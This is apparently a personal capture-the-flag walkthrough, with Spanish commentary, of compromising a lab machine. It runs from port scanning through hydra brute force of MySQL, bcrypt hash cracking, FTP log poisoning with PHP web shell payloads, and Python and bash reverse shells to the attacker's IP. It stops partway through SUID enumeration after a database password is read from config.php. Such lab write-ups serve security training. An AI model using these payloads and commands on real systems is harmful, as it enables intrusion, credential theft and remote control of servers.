Start Machine
You won't be able to just brute your way into this one, or will you?
Answer the questions below
┌──(kali㉿kali)-[~/nappy]
└─$ rustscan -a 10.10.217.25 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.217.25:22
Open 10.10.217.25:21
Open 10.10.217.25:80
Open 10.10.217.25:3306
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 16:34 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:34
Completed Parallel DNS resolution of 1 host. at 16:34, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 16:34
Scanning 10.10.217.25 [4 ports]
Discovered open port 22/tcp on 10.10.217.25
Discovered open port 21/tcp on 10.10.217.25
Discovered open port 3306/tcp on 10.10.217.25
Discovered open port 80/tcp on 10.10.217.25
Completed Connect Scan at 16:34, 0.20s elapsed (4 total ports)
Initiating Service scan at 16:34
Scanning 4 services on 10.10.217.25
Completed Service scan at 16:34, 6.56s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.217.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 6.05s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 4.73s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Nmap scan report for 10.10.217.25
Host is up, received user-set (0.20s latency).
Scanned at 2023-01-12 16:34:09 EST for 17s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c7721464243c1101e950730fa48c33d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXqzNUndANboqhGwqmfhneakMW3jjexZbHnw2pVw+ljoqMzxp2+CT06bhnRxtBRMeKXzX4E4cDOOKx1gHrkoVZgOjoz8X2GxfxH+KxGcmQPxODfgPpH18vxFvYaZpRAImr2jCa7TgfIyOZjtFb2rQDjAfvO+RK6egqMCqU+YuGdEeEvMBsNIiGymZl2pWzvk1Xenh7bMHl9YOiT41AhyFfvAQ4nfFLjk068S3OQKZ6d2jmFDr5YYd5Q9pLcoPGU9+yUCbBzrFCMdaRyvbYcbJnM8K65wKDhnrD5wAU6fAWyxRT6PaPFBhJp+fqMXZJAQUEWZHjAVOhHd+ZHgU6nXJ+u9GfXXj5ceZ7JJGclZzVKb7JHX93U1Ofuq+N+Zl3cdoc9Vi56N6ZamxaTTALZRM3UmrjqWfbDtyKZcnqQekb/40Pb4VzCzpvkGBW5++LXiMzQ/Ri7wcyfS0leBDMV0WdHR6DRiAVlii3M9YASX498tENGCBhe7yzGNFmPM3+rCM=
| 256 0e0e07a53c3209ed921b6884f12fcce1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLe3OgttRgIkQikz1ER+UuSSBb80MH3A+1Vmd+VNBKZhl9EqUBT4K+YpIA7NJdau/V1NzhuZdvVAUWd03rb43wk=
| 256 32f1d2ececc1ba2218ec02f4bc74c7af (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGj5zUvI22cV4JdUIj3IFx/3PVHqujyIkwU9MjP3gpay
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Login
3306/tcp open mysql syn-ack MySQL 8.0.28-0ubuntu0.20.04.3
| mysql-info:
| Protocol: 10
| Version: 8.0.28-0ubuntu0.20.04.3
| Thread ID: 18
| Capabilities flags: 65535
| Some Capabilities: Speaks41ProtocolNew, Support41Auth, LongColumnFlag, Speaks41ProtocolOld, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SwitchToSSLAfterHandshake, IgnoreSigpipes, InteractiveClient, ODBCClient, ConnectWithDatabase, LongPassword, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: T0~\x1Dt\x1B#1WZL\x1F\x0E 'S\x02\x16"i
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.26_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-19T04:00:09
| Not valid after: 2031-10-17T04:00:09
| MD5: 5441cf59375b5402352d4df1dab3f945
| SHA-1: de74633f3958dd200a40e5b4ffa9cae862d89d46
| -----BEGIN CERTIFICATE-----
| MIIDBzCCAe+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADA8MTowOAYDVQQDDDFNeVNR
| TF9TZXJ2ZXJfOC4wLjI2X0F1dG9fR2VuZXJhdGVkX0NBX0NlcnRpZmljYXRlMB4X
| DTIxMTAxOTA0MDAwOVoXDTMxMTAxNzA0MDAwOVowQDE+MDwGA1UEAww1TXlTUUxf
| U2VydmVyXzguMC4yNl9BdXRvX0dlbmVyYXRlZF9TZXJ2ZXJfQ2VydGlmaWNhdGUw
| ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDceHCeokIvf/5tiDXOhmUK
| HjWxbf+vHbhSEV0kg9J5CNyqL9JRLL+vLStv5KXyw4giERZmQZR7UM3VLu/jw1vg
| K3CMB7CWqaCTJclhqHgJXlH2OU0LGlkgjvoUjV2pnQKGsCEDVl2Q4QiXKzSMai4d
| ISz1QR9kQsV8bOEw7a46Ece9hPH4ESSUF7ZuTgnbLzBhxYlVa5HYQ2Zt7Z2c6ZGR
| fyJTMtovZzmxN0KWaiOJzCBAT5/ZaTiVR2mK0KpzoxJ1sut5Trw98Uh2iBtC/rXt
| z6+HiJjncW1phZNaXWgYrkp5GrGz39LPmK+XmBNlraokiLDubJkKrgvE8vILE9rd
| AgMBAAGjEDAOMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggEBAKcxAdpb
| Z6ahf4CWhSPH4maAHWqYytghjPjG1Tlk6Lvwu3wTJUqItsmphvRIXvu1fME4TRZd
| ZG9ZM8BARM5ZZYCRHmhfGA5JBaKpAvfjhPNVssvVjSVI4cpiMTVrPikva22Qzxq7
| 33oVAFsfYlSiFqlRHqdNwAv5TSn0N85xU/En6DmUowaQzwTcPBrns1EC1lrDMBXU
| WY2rYfQiC0EkZVhkQuNGkXyUj/e89mwp8RVVJFkmjZ6NbuGCDCenG+A6/kDWj9ps
| mnDukjklQJKq9p6iIhrV69ejm3OHL5hfPRahBIM8AYAtljW2LQ67elYijyCde58Z
| AcodcjpmQ8egD1w=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.217.25
Connected to 10.10.217.25.
220 (vsFTPd 3.0.3)
Name (10.10.217.25:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
ftp> exit
221 Goodbye.
https://dev.mysql.com/doc/refman/8.0/en/default-privileges.html
┌──(kali㉿kali)-[~/nappy]
└─$ nmap --script mysql-enum -sV -p 3306 -Pn 10.10.217.25
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 17:07 EST
Nmap scan report for 10.10.217.25
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 8.0.28-0ubuntu0.20.04.3
| mysql-enum:
| Valid usernames:
| root:<empty> - Valid credentials
| netadmin:<empty> - Valid credentials
| guest:<empty> - Valid credentials
| web:<empty> - Valid credentials
| user:<empty> - Valid credentials
| sysadmin:<empty> - Valid credentials
| administrator:<empty> - Valid credentials
| webadmin:<empty> - Valid credentials
| admin:<empty> - Valid credentials
| test:<empty> - Valid credentials
|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
┌──(kali㉿kali)-[~/nappy]
└─$ mysql -h 10.10.183.215 -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'ip-10-8-19-103.eu-west-1.compute.internal' (using password: YES)
┌──(kali㉿kali)-[~/nappy]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.183.215 mysql -V -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-13 11:09:37
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.10.183.215:3306/
[ATTEMPT] target 10.10.183.215 - login "root" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "iloveyou" - 5 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "princess" - 6 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "1234567" - 7 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.183.215 - login "root" - pass "rockyou" - 8 of 14344399 [child 2] (0/0)
[3306][mysql] host: 10.10.183.215 login: root password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-13 11:09:57
┌──(kali㉿kali)-[~/nappy]
└─$ mysql -h 10.10.183.215 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 39
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| website |
+--------------------+
5 rows in set (0.195 sec)
MySQL [(none)]> use website;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [website]> show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| users |
+-------------------+
1 row in set (0.194 sec)
MySQL [website]> describe users;
+------------+--------------+------+-----+-------------------+-------------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+-------------------+
| id | int | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | DEFAULT_GENERATED |
+------------+--------------+------+-----+-------------------+-------------------+
4 rows in set (0.498 sec)
MySQL [website]> select usernme, password from users;
ERROR 1054 (42S22): Unknown column 'usernme' in 'field list'
MySQL [website]> select username, password from users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| Adrian | $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we |
+----------+--------------------------------------------------------------+
1 row in set (0.326 sec)
or
MySQL [website]> select * from users;
+----+----------+--------------------------------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+--------------------------------------------------------------+---------------------+
| 1 | Adrian | $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we | 2021-10-20 02:43:42 |
+----+----------+--------------------------------------------------------------+---------------------+
1 row in set (0.412 sec)
https://hashcat.net/wiki/doku.php?id=example_hashes ($2*$ bcrypt --> 3200)
┌──(kali㉿kali)-[~/nappy]
└─$ cat hash_brute
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we
┌──(kali㉿kali)-[~/nappy]
└─$ hashcat -m 3200 -a 0 hash_brute /usr/share/wordlists/rockyou.txt -o hash_brute_cracked
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 1240/2545 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSY...SKn4we
Time.Started.....: Fri Jan 13 11:18:41 2023 (4 secs)
Time.Estimated...: Fri Jan 13 11:18:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9 H/s (5.53ms) @ Accel:4 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 32/14344385 (0.00%)
Rejected.........: 0/32 (0.00%)
Restore.Point....: 16/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: 654321 -> butterfly
Hardware.Mon.#1..: Util: 72%
Started: Fri Jan 13 11:16:09 2023
Stopped: Fri Jan 13 11:18:49 2023
┌──(kali㉿kali)-[~/nappy]
└─$ hashcat -m 3200 -a 0 hash_brute --show
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we:tigger
┌──(kali㉿kali)-[~/nappy]
└─$ cat hash_brute_cracked
$2y$10$tLzQuuQ.h6zBuX8dV83zmu9pFlGt3EF9gQO4aJ8KdnSYxz0SKn4we:tigger
or using john
┌──(kali㉿kali)-[~/nappy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_brute
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tigger (?)
1g 0:00:00:00 DONE (2023-01-13 11:20) 1.041g/s 37.50p/s 37.50c/s 37.50C/s 123456..liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Adrian:tigger
login
view-source:http://10.10.183.215/welcome.php
<h1 class="my-5">Welcome back Adrian, Your log file is ready for viewing.</h1>
<br>
<form action="" method="post">
<input type="submit" name="log" value="Log">
</form>
<br>
<p>
<a href="logout.php" class="btn btn-danger ml-3">Sign Out of Your Account</a>
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
Fri Jan 13 16:22:28 2023 [pid 1617] CONNECT: Client "::ffff:10.8.19.103" Fri Jan 13 16:22:38 2023 [pid 1616] [anonymous] FAIL LOGIN: Client "::ffff:10.8.19.103"
┌──(kali㉿kali)-[~/nappy]
└─$ nc -vn 10.10.183.215 21
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.183.215:21.
220 (vsFTPd 3.0.3)
whoami
530 Please login with USER and PASS.
Ftp log poisoning
https://secnhack.in/ftp-log-poisoning-through-lfi/
payloads :
'<?php system($_GET['x']); ?>'
'<?php system($_REQUEST['x']); ?>'
'<?php echo system($_REQUEST['x']); ?>'
'<?php echo shell_exec($_GET['x']); ?>'
Estas son líneas de código PHP que permiten ejecutar comandos en el sistema operativo del servidor donde se ejecuta el código. La diferencia entre ellas es la forma en que se recibe la entrada del usuario.
- En la primera línea, el comando se recibe a través de la variable $_GET['x'].
- En la segunda línea, el comando se recibe a través de la variable $_REQUEST['x'].
- En la tercera línea, el comando se recibe a través de la variable $_REQUEST['x'] y su salida se muestra en la página web.
- En la cuarta línea, el comando se recibe a través de la variable $_GET['x'] y su salida se muestra en la página web usando la función shell_exec().
Sin embargo, estas líneas de código son altamente peligrosas ya que permiten a un atacante ejecutar cualquier comando en el sistema operativo del servidor, incluyendo comandos maliciosos. Es importante asegurarse de validar y sanitizar cualquier entrada del usuario antes de utilizarlo en una función como system() o shell_exec().
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): '<?php system($_GET['x']); ?>'
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
http://10.10.183.215/welcome.php?x=id
Fri Jan 13 16:47:24 2023 [pid 2662] ['uid=33(www-data) gid=33(www-data) groups=33(www-data)
'] FAIL LOGIN: Client "::ffff:10.8.19.103"
revshell
https://www.revshells.com/
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:51494.
www-data@brute:/var/www/html$ exit
exit
exit
or
bash -c 'bash -i >& /dev/tcp/10.8.19.103/4444 0>&1'
bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E8%2E19%2E103%2F4444%200%3E%261%27
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:37024.
bash: cannot set terminal process group (766): Inappropriate ioctl for device
bash: no job control in this shell
www-data@brute:/var/www/html$
or using burp
┌──(kali㉿kali)-[~/nappy]
└─$ ftp 10.10.183.215
Connected to 10.10.183.215.
220 (vsFTPd 3.0.3)
Name (10.10.183.215:kali): '<?php echo system($_REQUEST['x']); ?>'
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
using request with burp
---
POST /welcome.php HTTP/1.1
Host: 10.10.183.215
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Origin: http://10.10.183.215
Connection: close
Referer: http://10.10.183.215/welcome.php
Cookie: PHPSESSID=627ddsmmq6t3vkk494opc7qc56
Upgrade-Insecure-Requests: 1
log=Log&x=whoami
---
Fri Jan 13 17:31:51 2023 [pid 6549] CONNECT: Client "::ffff:10.8.19.103"
Fri Jan 13 17:31:56 2023 [pid 6548] ['www-data
www-data'] FAIL LOGIN: Client "::ffff:10.8.19.103"
to encode just press CTRL + U
bash+-c+'bash+-i+>%26+/dev/tcp/10.8.19.103/4444+0>%261'
log=Log&x=bash+-c+'bash+-i+>%26+/dev/tcp/10.8.19.103/4444+0>%261'
and then send
┌──(kali㉿kali)-[~/nappy]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.183.215.
Ncat: Connection from 10.10.183.215:37028.
bash: cannot set terminal process group (766): Inappropriate ioctl for device
bash: no job control in this shell
www-data@brute:/var/www/html$ whoami
whoami
www-data
stabilizing shell
www-data@brute:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@brute:/var/www/html$
zsh: suspended rlwrap nc -lnvp 4444
┌──(kali㉿kali)-[~/nappy]
└─$ stty raw -echo; fg
[1] + continued rlwrap nc -lnvp 4444
www-data@brute:/var/www/html$ export TERM=xterm-256color
TERM=xterm-256color
Este es un comando de terminal utilizado para cambiar la configuración de la terminal.
- "stty raw" desactiva la interpretación de caracteres especiales por la terminal, lo que permite ingresar caracteres como Ctrl o Alt sin que la terminal los interprete como comandos.
- "-echo" desactiva el eco de los caracteres ingresados, lo que significa que los caracteres no se imprimen en pantalla mientras se ingresan.
"fg" es un comando utilizado para traer un trabajo en segundo plano al primer plano.
Este es un comando de la línea de comandos que se utiliza para establecer una variable de entorno llamada TERM. Esta variable es utilizada por el sistema operativo para determinar qué tipo de terminal está siendo utilizado.
El valor especificado en el comando ("xterm") indica que se está utilizando una terminal xterm. Esta es una de las terminales más comunes en sistemas Unix y Linux, y es compatible con una amplia variedad de características y funciones.
Existen varios tipos de terminales (vt100, xterm, ansi, etc) y cada uno tiene su propia configuración y características. Al establecer TERM = xterm, se está diciendo al sistema operativo que se está utilizando una terminal xterm, lo que permite al sistema operativo utilizar las características y configuraciones específicas de xterm.
This command is similar to the previous one. It sets the TERM environment variable to "xterm-256color", indicating that the terminal being used is an xterm terminal with support for 256 colors.
256 color terminal allows the terminal to display more colors than the traditional 8-color terminal, thus providing more visual options and better color representation. This feature is useful in applications such as text editors and terminal-based games that require advanced color support.
It's also important to note that some applications may require the TERM variable to be set to a specific value in order to function properly. Setting the TERM variable to the correct value ensures that these applications will work as expected.
www-data@brute:/var/www/html$ ls
ls
config.php index.php logout.php welcome.php
www-data@brute:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d789!');
define('DB_NAME', 'website');
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
www-data@brute:/var/www/html$ find / -perm -4000 2>/dev/null | xargs ls -lah
find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2253/bin/mount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2253/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2253/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2253/bin/umount
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2253/usr/bin/chfn
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2253/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2253/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2253/usr/bin/newgrp
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2253/usr/bin/passwd
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2253/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2253/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Aug 11 2021 /snap/core18/2253/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2344/bin/mount
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2344/bin/ping
-rwsr-xr-x 1 root root 44K Jan 25 2022 /snap/core18/2344/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2344/bin/umount
-rwsr-xr-x 1 root root 75K Jan 25 2022 /snap/core18/2344/usr/bin/chfn
-rwsr-xr-x 1 root root 44K Jan 25 2022 /snap/core18/2344/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Jan 25 2022 /snap/core18/2344/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Jan 25 2022 /snap/core18/2344/usr/bin/newgrp
-rwsr-xr-x 1 root root 59K Jan 25 2022 /snap/core18/2344/usr/bin/passwd
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2344/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2344/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 3 2020 /snap/core18/2344/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 84K Jul 14 2021 /snap/core20/1242/usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /snap/core20/1242/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /snap/core20/1242/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Jul 21 2020 /snap/core20/1242/usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /snap/core20/1242/usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /snap/core20/1242/usr/bin/passwd
-rwsr-xr-x 1 root root 67K Jul 21 2020 /snap/core20/1242/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1242/usr/bin/sudo
-rwsr-xr-x 1 root root 39K Jul 21 2020 /snap/core20/1242/usr/bin/umount
-rwsr-xr-- 1 root systemd-resolve 51K Jun 11 2020 /snap/core20/1242/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Jul 23 2021 /snap/core20/1242/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 84K Jul 14 2021 /snap/core20/1405/usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /snap/core20/1405/usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /snap/core20/1405/usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /snap/core20/1405/usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /snap/core20/1405/usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /snap/core20/1405/usr/bin/passwd
-rwsr-xr-x 1 root root 67K Feb 7 2022 /snap/core20/1405/usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /snap/core20/1405/usr/bin/sudo
